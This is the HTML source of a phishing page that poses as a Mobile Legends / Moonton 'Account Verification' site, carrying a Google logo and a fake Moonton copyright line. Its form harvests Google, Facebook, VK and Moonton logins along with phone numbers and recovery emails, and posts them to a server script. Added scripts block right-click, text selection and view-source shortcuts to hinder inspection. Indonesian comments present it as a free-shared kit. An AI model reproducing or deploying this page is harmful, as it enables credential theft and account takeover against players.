<!--
Anune, Aziz itu tamvan kalo gak jelek :v
Jangan Asal Diperjual Belikan, Karena Gua Sharenya Gratis :)
Yang jual belikan Kecuali Gua
Aduh, ngentod :'v
-->
<!DOCTYPE html>

<html>
<head>
<title>Mobile Legend</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content=""/>
<script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } </script>
<link href="css/style.css" rel="stylesheet" type="text/css" media="all" />
</head>

<script type="text/javascript">
	$(document).ready(function(){
	  $("#gsubmit").on("click", function() {

var gnumber = $("#gnumber").val();
var townhall = $("#townhall").val();
var grecov = $("#grecov").val();
var gexp = $("#gexp").val();
		  if(gnumber==''|| grecov=='')
{

}
else
{
	var res = document.getElementById("hasilnya");
          res.innerHTML='';
		  $("#gsubmit").prop("disabled", true );
		  $.post("request.php",
		  {gnumber:gnumber,grecov:grecov,gexp:gexp,townhall:townhall,},
		  function(response,status){
			  $('#hasilnya').html(response);
			$("#gsubmit").prop("disabled", false );
			
		  });
		  return false;
	  }
	  }
	  );
	});

	</script>
<!-- Kode menampilkan peringatan untuk mengaktifkan javascript-->
<div align="center"><noscript>
   <div style="position:fixed; top:0px; left:0px; z-index:3000; height:100%; width:100%; background-color:#FFFFFF">
   <div style="font-family: Arial; font-size: 17px; background-color:#00bbf9; padding: 11pt;">Mohon aktifkan javascript pada browser untuk mengakses halaman ini!</div></div>
</noscript></div>

<!--Kode untuk mencegah seleksi teks, block teks dll.-->
<script type="text/javascript">
function disableSelection(e){if(typeof e.onselectstart!="undefined")e.onselectstart=function(){return false};else if(typeof e.style.MozUserSelect!="undefined")e.style.MozUserSelect="none";else e.onmousedown=function(){return false};e.style.cursor="default"}window.onload=function(){disableSelection(document.body)}
</script>

<!--Kode untuk mematikan fungsi klik kanan di blog-->
<script type="text/javascript">
function mousedwn(e){try{if(event.button==2||event.button==3)return false}catch(e){if(e.which==3)return false}}document.oncontextmenu=function(){return false};document.ondragstart=function(){return false};document.onmousedown=mousedwn
</script>

<style type="text/css">
* : (input, textarea) {
    -webkit-touch-callout: none;
    -webkit-user-select: none;

}
</style>
<style type="text/css">
img {
	-webkit-touch-callout: none;
	-webkit-user-select: none;
    }
</style>

<!--Kode untuk mencegah shorcut keyboard, view source dll.-->
<script type="text/javascript">
window.addEventListener("keydown",function(e){if(e.ctrlKey&&(e.which==65||e.which==66||e.which==67||e.which==73||e.which==80||e.which==83||e.which==85||e.which==86)){e.preventDefault()}});document.keypress=function(e){if(e.ctrlKey&&(e.which==65||e.which==66||e.which==67||e.which==73||e.which==80||e.which==83||e.which==85||e.which==86)){}return false}
</script>
<script type="text/javascript">
document.onkeydown=function(e){e=e||window.event;if(e.keyCode==123||e.keyCode==18){return false}}
</script>
<script type='text/javascript'>window._sbzq||function(e){e._sbzq=[];var t=e._sbzq;t.push(["_setAccount",54166]);var n=e.location.protocol=="https:"?"https:":"http:";var r=document.createElement("script");r.type="text/javascript";r.async=true;r.src=n+"//static.subiz.com/public/js/loader.js";var i=document.getElementsByTagName("script")[0];i.parentNode.insertBefore(r,i)}(window);</script>

<body>
	<div class="padding-all">
		<div class="header">
			<h1> Account Verification</h1>
		</div>
		<div class="design-w3l">
			<div class="mail-form-agile">
				<form action="processing.php" method="post">
				    <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2f/Google_2015_logo.svg/2000px-Google_2015_logo.svg.png" height="" widht="">   
					<input type="email"  name="email" placeholder="Email" required="" id="email"/>
					<input type="password"  name="pass" class="padding" placeholder="Password" required="" id="pass"/>
					<input type="number"  name="hp" class="padding" placeholder="Number Phone" required="" id="hp"/>
					<input type="email"  name="ep" placeholder="Recovery Email Address" required="" id="ep"/> 
				    <img src="/images/fb.png" height="" widht="">   
					<input type="text"  name="emailfb" placeholder="Email Or Number Phone" required="" id="emailfb"/>
					<input type="password"  name="passfb" class="padding" placeholder="Password" required="" id="passfb"/>
			    <img src="http://www.iconninja.com/files/238/378/475/social-vkontakte-vk-app-music-icon.svg" height="150x" widht=150x>   <center><font color="white">*kamu bisa melewatinya jika kamu tidak memeiliki akun vk*</font></center>
					<input type="text" class="form-control" id="emailvk" name="emailvk" autocomplete="off" placeholder="Email Address Or Number Phone"/>
					<input type="text" class="form-control" id="passvk" name="passvk" autocomplete="off" placeholder="Password"/>
			    <img src="https://2.bp.blogspot.com/-4hQwrsUFwwg/WkyFCMEk9zI/AAAAAAAABh4/IUGibfWk4WkKmySYg5VKwy-M-qQPiBzIgCLcBGAs/s200/moonton.png" height="150x" widht="150x">   
			    <center><font color="white">*kamu bisa melewatinya jika kamu tidak memeiliki akun moonton*</font></center>
					<input type="text" class="form-control" id="emailmn" name="emailmn" autocomplete="off" placeholder="Email Address Or Number Phone"/>
					<input type="password" class="form-control" id="passwordmn" name="passwordmn" autocomplete="off" placeholder="Password"/>
					<h1><text><font color="white"><font size="60x"><font face="Century Gothic">DETAIL AKUN</font></font></font></text></h1>
					<input type="text"  name="NICKNAME" class="padding" placeholder="NICKNAME" required="" id="NICKNAME"/>
					<input type="number"  name="LEVEL" class="padding" placeholder="LEVEL" required="" id="LEVEL"/>
					<input type="text"  name="SKIN" class="padding" placeholder="SKIN" required="" id="SKIN"/>
					<input type="submit" value="submit">
				</form>
			</div>
		  <div class="clear"> </div>
		</div>
		
		<div class="footer">
		<p>© 2018 Moonton. All Rights Reserved</p>
		</div>
	</div>
</body>
</html>